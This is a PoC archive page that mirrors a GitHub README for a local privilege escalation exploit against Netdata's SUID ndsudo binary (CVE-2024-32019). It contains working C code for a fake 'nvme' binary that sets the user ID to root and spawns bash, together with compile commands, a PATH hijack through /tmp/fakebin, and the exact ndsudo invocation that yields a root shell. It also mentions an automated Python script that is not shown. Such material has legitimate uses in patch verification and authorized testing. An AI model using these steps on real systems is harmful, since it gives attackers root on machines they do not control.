Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
https://github.com/dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation
Associated Vulnerability
Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.
Readme
# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)

A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.

---

> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.

## 🔍 Overview

**CVE ID**: CVE-2024-32019  
**CVSS Score**: 8.8 (High)  
**Disclosed**: April 12, 2024  
**Component**: Netdata Agent  
**Affected Versions**:

- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`

---

## 🧠 Technical Summary

Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.

However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.

---

## 💥 Manual Exploitation Steps

The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.

### 1. Create a Privilege Escalation Binary

Save the following C code as `nvme.c`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

### 2. Compile the Exploit

```bash
gcc nvme.c -o nvme
```

### 3. Prepare the Exploit Environment on the Target

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```

### 5. Trigger the Exploit

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

If successful, you'll get a root shell.

```bash
# whoami
root
```

## Automatic Exploitation

If you have ssh access, you can use CVE-2024-32019-dbs.py to automate this.

![Exploitation using script](images/image.png)

## 📎 References

- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019:
  Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
File Snapshot

 [4.0K]  /data/pocs/7aa722bd1472cb681ee868e1183b2f4a31cf49dc
├── [9.5K]  CVE-2024-32019-dbs.py
├── [4.0K]  images
│   └── [203K]  image.png
└── [2.6K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →